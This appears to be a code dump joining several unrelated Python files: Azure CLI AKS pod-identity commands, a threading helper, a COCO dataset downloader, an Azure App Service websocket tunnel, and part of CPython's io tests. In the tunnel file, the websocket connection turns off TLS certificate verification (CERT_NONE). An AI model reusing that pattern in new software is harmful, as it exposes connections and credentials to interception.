config_object.sysctls.net_core_netdev_max_backlog = sysctls.get("netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get("netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get("netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get("netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get("netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get("netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get("netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get("netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get("netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get("netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get("netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get("netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get("netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get("netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get("netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get("netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get("netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get("netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get("netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get("fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get("kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get("vmVfsCachePressure", None)
return config_object
def _ensure_pod_identity_addon_is_enabled(instance):
addon_enabled = False
if instance and instance.pod_identity_profile:
addon_enabled = instance.pod_identity_profile.enabled
if not addon_enabled:
raise CLIError('The pod identity addon is not enabled for this managed cluster yet.\n'
'To enable, run "az aks update --enable-pod-identity')
def _update_addon_pod_identity(instance, enable, pod_identities=None, pod_identity_exceptions=None):
if not enable:
# when disable, null out the profile
instance.pod_identity_profile = None
return
if not instance.pod_identity_profile:
# not set before
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=True,
user_assigned_identities=pod_identities,
user_assigned_identity_exceptions=pod_identity_exceptions,
)
return
instance.pod_identity_profile.enabled = True
instance.pod_identity_profile.user_assigned_identities = pod_identities or []
instance.pod_identity_profile.user_assigned_identity_exceptions = pod_identity_exceptions or []
def _ensure_managed_identity_operator_permission(cli_ctx, instance, scope):
managed_identity_operator_role = 'Managed Identity Operator'
managed_identity_operator_role_id = 'f1a07417-d97a-45cb-824c-7a7467783830'
cluster_identity_object_id = None
if instance.identity.type.lower() == 'userassigned':
for identity in instance.identity.user_assigned_identities.values():
cluster_identity_object_id = identity.principal_id
break
elif instance.identity.type.lower() == 'systemassigned':
cluster_identity_object_id = instance.identity.principal_id
else:
raise CLIError('unsupported identity type: {}'.format(instance.identity.type))
if cluster_identity_object_id is None:
raise CLIError('unable to resolve cluster identity')
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(managed_identity_operator_role_id):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, managed_identity_operator_role, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError('Could not grant Managed Identity Operator permission for cluster')
# need more time to propogate this assignment...
print()
print('Wait 30 seconds for identity role assignment propagation.')
time.sleep(30)
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError('pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
|
parfor.py | from typing import Any, Callable, List
import threading
def parfor(data_list: List[Any], func: Callable, num_workers: int, prog_bar: bool = True, **kwargs):
"""a parfor implementation
Args:
data_list ([list]): a list stores all the data
func ([function]): a function which has three parameters: worker_id, data, kwargs
num_workers ([int]): the number of workers to work on the data_list
prog_bar ([bool]): whether to show the progress bar
kwargs: other args for func
"""
index = 0
lock = threading.Lock()
if prog_bar:
from tqdm import tqdm
bar = tqdm(total=len(data_list))
def do_work(worker_id):
nonlocal index
while True:
# get data
lock.acquire()
if index < len(data_list):
data = data_list[index]
index += 1
if prog_bar:
bar.update()
else:
data = None
lock.release()
# handle data
if data is not None:
func(worker_id, data, **kwargs)
else:
break
if num_workers > 0:
threads = []
for i in range(num_workers):
t = threading.Thread(target=do_work, args=[i])
t.start()
threads.append(t)
for i, t in enumerate(threads):
t.join()
else:
do_work(0)
if prog_bar:
bar.close()
if __name__ == '__main__':
sum = [0]
lock = threading.Lock()
def myfunc(worker_id, data, passwd):
lock.acquire()
sum[0] += 1
lock.release()
parfor(list(range(1000000)), myfunc, 10, passwd=1)
print(sum)
|
coco_download.py | from __future__ import print_function
from pycocotools.coco import COCO
import os
import zipfile
import shutil
import skimage.io as io
from PIL import Image
from threading import Thread, Lock
from urllib.error import URLError
from urllib.request import urlopen
# Choose main data dir and category from:
# person bicycle car motorcycle airplane bus train truck boat traffic light fire hydrant stop sign parking meter bench
# bird cat dog horse sheep cow elephant bear zebra giraffe backpack umbrella handbag tie suitcase frisbee skis snowboard
# sports ball kite baseball bat glove skateboard surfboard tennis racket bottle wine glass cup fork knife spoon
# bowl banana apple sandwich orange broccoli carrot hot dog pizza donut cake chair couch potted plant bed dining table
# toilet tv laptop mouse remote keyboard cell phone microwave oven toaster sink refrigerator book clock vase scissors
# teddy bear hair drier toothbrush
data_dir = '../data/coco'
set_name = 'cat'
categories = ['cat']
download_count = 100000 # number of images to download
num_of_threads = 20
# consts
DATA_TYPE = 'val2014'
ANN_URL = 'http://images.cocodataset.org/annotations/annotations_train{}.zip'.format(DATA_TYPE)
# Setup paths
annDir = '%s/annotations' % data_dir
annZipFile = '%s/annotations_%s.zip' % (data_dir, DATA_TYPE)
annFile = '%s/instances_%s.json' % (annDir, DATA_TYPE)
images_dir = '%s/%s' % (data_dir, set_name)
def download_json():
if not os.path.exists(annDir):
os.makedirs(annDir)
if not os.path.exists(annFile):
if not os.path.exists(annZipFile):
print("Downloading zipped annotations to " + annZipFile + " ...")
resp = urlopen(ANN_URL)
with open(annZipFile, 'wb') as out:
shutil.copyfileobj(resp, out)
print("... done downloading.")
resp.close()
print("Unzipping " + annZipFile)
with zipfile.ZipFile(annZipFile, "r") as zip_ref:
zip_ref.extractall(data_dir)
print("... done unzipping")
print("Will use annotations in " + annFile)
def download_setup():
global download_count
coco = COCO(annFile)
img_cats = []
img_ids = set()
min_cat = download_count
for category in categories:
cat_ids = coco.getCatIds(catNms=[category])
img_cats.append(coco.getImgIds(catIds=cat_ids))
if len(img_cats[-1]) < min_cat:
min_cat = len(img_cats[-1])
for i in range(min_cat):
for c in img_cats:
if c[i] not in img_ids:
img_ids.add(c[i])
img_ids = list(img_ids)
download_count = min(download_count, len(img_ids))
if not os.path.exists(images_dir):
os.makedirs(images_dir)
return coco, img_ids
def download_thread(t, coco, img_ids):
thread_count = download_count // num_of_threads + 1
start_count = t * thread_count
end_count = min(start_count + thread_count, download_count)
for i in range(start_count, end_count):
file_name = '%s/%04d.png' % (images_dir, i + 1)
if not os.path.exists(file_name):
for j in range(3):
try:
lock.acquire()
img = coco.loadImgs(img_ids[i])[0]
lock.release()
img = io.imread(img['coco_url'])
img = Image.fromarray(img)
img.save(file_name, 'png')
break
except URLError:
print('connection problem')
print('work done: thread %d' % t)
def download_main():
download_json()
threads = []
coco, img_ids = download_setup()
for t in range(num_of_threads):
threads.append(Thread(target=download_thread, args=(t, coco, img_ids)))
threads[t].start()
for t in range(num_of_threads):
threads[t].join()
print('all done')
if __name__ == '__main__':
lock = Lock()
download_main()
|
tunnel.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=import-error,unused-import
import sys
import ssl
import json
import socket
import time
import traceback
import logging as logs
from contextlib import closing
from datetime import datetime
from threading import Thread
import websocket
from websocket import create_connection, WebSocket
from knack.util import CLIError
from knack.log import get_logger
logger = get_logger(__name__)
class TunnelWebSocket(WebSocket):
def recv_frame(self):
frame = super(TunnelWebSocket, self).recv_frame()
logger.info('Received frame: %s', frame)
return frame
def recv(self):
data = super(TunnelWebSocket, self).recv()
logger.info('Received websocket data: %s', data)
return data
# pylint: disable=no-member,too-many-instance-attributes,bare-except,no-self-use
class TunnelServer(object):
def __init__(self, local_addr, local_port, remote_addr, remote_user_name, remote_password):
self.local_addr = local_addr
self.local_port = local_port
if self.local_port != 0 and not self.is_port_open():
raise CLIError('Defined port is currently unavailable')
if remote_addr.startswith("https://"):
self.remote_addr = remote_addr[8:]
else:
self.remote_addr = remote_addr
self.remote_user_name = remote_user_name
self.remote_password = remote_password
self.client = None
self.ws = None
logger.info('Creating a socket on port: %s', self.local_port)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
logger.info('Setting socket options')
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
logger.info('Binding to socket on local address and port')
self.sock.bind((self.local_addr, self.local_port))
if self.local_port == 0:
self.local_port = self.sock.getsockname()[1]
logger.info('Auto-selecting port: %s', self.local_port)
logger.info('Finished initialization')
def create_basic_auth(self):
from base64 import b64encode
basic_auth_string = '{}:{}'.format(self.remote_user_name, self.remote_password).encode()
basic_auth_string = b64encode(basic_auth_string).decode('utf-8')
return basic_auth_string
def is_port_open(self):
is_port_open = False
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
if sock.connect_ex(('', self.local_port)) == 0:
logger.info('Port %s is NOT open', self.local_port)
else:
logger.info('Port %s is open', self.local_port)
is_port_open = True
return is_port_open
def is_webapp_up(self):
import certifi
import urllib3
from azure.cli.core.util import should_disable_connection_verify
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
if should_disable_connection_verify():
http = urllib3.PoolManager(cert_reqs='CERT_NONE')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(self.remote_user_name, self.remote_password))
url = 'https://{}{}'.format(self.remote_addr, '/AppServiceTunnel/Tunnel.ashx?GetStatus&GetStatusAPIVer=2')
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
logger.warning('Verifying if app is running....')
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
resp_msg = r.read().decode('utf-8')
json_data = json.loads(resp_msg)
if json_data.get('state', None) is None:
return False
if 'STARTED' in json_data["state"].upper():
if json_data["canReachPort"] is False:
raise CLIError(
'SSH is not enabled for this app. '
'To enable SSH follow this instructions: '
'https://go.microsoft.com/fwlink/?linkid=2132395')
if json_data["canReachPort"] is True:
logger.warning("App is running. Trying to establish tunnel connection...")
return True
elif 'STOPPED' in json_data["state"].upper():
raise CLIError(
'SSH endpoint unreachable, your app must be '
'running before it can accept SSH connections.'
'Use `az webapp log tail` to review the app startup logs.')
elif 'STARTING' in json_data["state"].upper():
logger.warning('Waiting for app to start up... ')
return False
def _listen(self):
self.sock.listen(100)
index = 0
basic_auth_string = self.create_basic_auth()
while True:
self.client, _address = self.sock.accept()
self.client.settimeout(60 * 60)
host = 'wss://{}{}'.format(self.remote_addr, '/AppServiceTunnel/Tunnel.ashx')
basic_auth_header = 'Authorization: Basic {}'.format(basic_auth_string)
cli_logger = get_logger() # get CLI logger which has the level set through command lines
is_verbose = any(handler.level <= logs.INFO for handler in cli_logger.handlers)
if is_verbose:
logger.info('Websocket tracing enabled')
websocket.enableTrace(True)
else:
logger.info('Websocket tracing disabled, use --verbose flag to enable')
websocket.enableTrace(False)
self.ws = create_connection(host,
sockopt=((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),),
class_=TunnelWebSocket,
header=[basic_auth_header],
sslopt={'cert_reqs': ssl.CERT_NONE},
timeout=60 * 60,
enable_multithread=True)
logger.info('Websocket, connected status: %s', self.ws.connected)
index = index + 1
logger.info('Got debugger connection... index: %s', index)
debugger_thread = Thread(target=self._listen_to_client, args=(self.client, self.ws, index))
web_socket_thread = Thread(target=self._listen_to_web_socket, args=(self.client, self.ws, index))
debugger_thread.start()
web_socket_thread.start()
logger.info('Both debugger and websocket threads started...')
logger.info('Successfully connected to local server..')
debugger_thread.join()
web_socket_thread.join()
logger.info('Both debugger and websocket threads stopped...')
logger.info('Stopped local server..')
def _listen_to_web_socket(self, client, ws_socket, index):
try:
while True:
logger.info('Waiting for websocket data, connection status: %s, index: %s', ws_socket.connected, index)
data = ws_socket.recv()
logger.info('Received websocket data: %s, index: %s', data, index)
if data:
# Set the response to echo back the recieved data
response = data
logger.info('Sending to debugger, response: %s, index: %s', response, index)
client.sendall(response)
logger.info('Done sending to debugger, index: %s', index)
else:
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
logger.info('Client disconnected!, index: %s', index)
client.close()
ws_socket.close()
def _listen_to_client(self, client, ws_socket, index):
try:
while True:
logger.info('Waiting for debugger data, index: %s', index)
buf = bytearray(4096)
nbytes = client.recv_into(buf, 4096)
logger.info('Received debugger data, nbytes: %s, index: %s', nbytes, index)
if nbytes > 0:
responseData = buf[0:nbytes]
logger.info('Sending to websocket, response data: %s, index: %s', responseData, index)
ws_socket.send_binary(responseData)
logger.info('Done sending to websocket, index: %s', index)
else:
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
logger.warning("Connection Timed Out")
finally:
logger.info('Client disconnected %s', index)
client.close()
ws_socket.close()
def start_server(self):
self._listen()
def get_port(self):
return self.local_port
|
test_io.py | """Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import random
import unittest
import weakref
import warnings
import abc
import signal
import errno
from itertools import cycle, count
from collections import deque
from UserList import UserList
from test import test_support as support
import contextlib
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
__metaclass__ = type
bytes = support.py3k_bytes
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with io.open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return MockRawIO.write(self, b) * 2
def read(self, n=None):
return MockRawIO.read(self, n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
MockRawIO.readinto(self, buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super(MockFileIO, self).__init__(data)
def read(self, n=None):
res = super(MockFileIO, self).read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super(MockFileIO, self).readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1 // 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1 // 0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super(MyFileIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyFileIO, self).close()
def flush(self):
record.append(3)
super(MyFileIO, self).flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
